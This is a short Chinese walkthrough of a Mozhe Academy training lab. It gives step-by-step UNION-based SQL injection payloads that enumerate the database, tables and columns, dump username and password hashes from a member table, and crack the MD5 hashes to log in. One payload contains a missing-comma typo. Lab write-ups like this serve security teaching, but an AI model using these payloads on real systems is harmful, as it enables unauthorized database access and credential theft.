墨者学院PHP,墨者学院SQL注入解题

一·判断注入

输入id=1，正常返回。输入id=-1返回错误。由 此可知存在注入。

二·判断字段

URL id=-1 order by 1

URL id=-1 order by 2

URL id=-1 order by 3

URL id=-1 order by 4

URL id=-1 order by 5 此时报错，说明有四个字段

三·使用union查询注入点

输入union select 1，2，3，4

发现2，3为显注点

四·使用database()查库名

输入 union select 1，database()，3，4

查出库名为 mozhe_Discuz_StormGroup

五·查表名

输入

union select 1，group_concat(table_name)，3，4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

查询到StormGroup_member,notice

看见member，所以对第一个产生怀疑。所以首先查询第一个。

六·查询StormGroup_member中的存放的字段

输入

union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’

查询出id，name，password，status

七·查询密码和用户名

union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member

得到md5加密后的值。进行解密，得到密码。

如果密码不对，通过limit m，n来继续查询。

八·提交key

得到密码后进行登录可以看见key，复制，提交。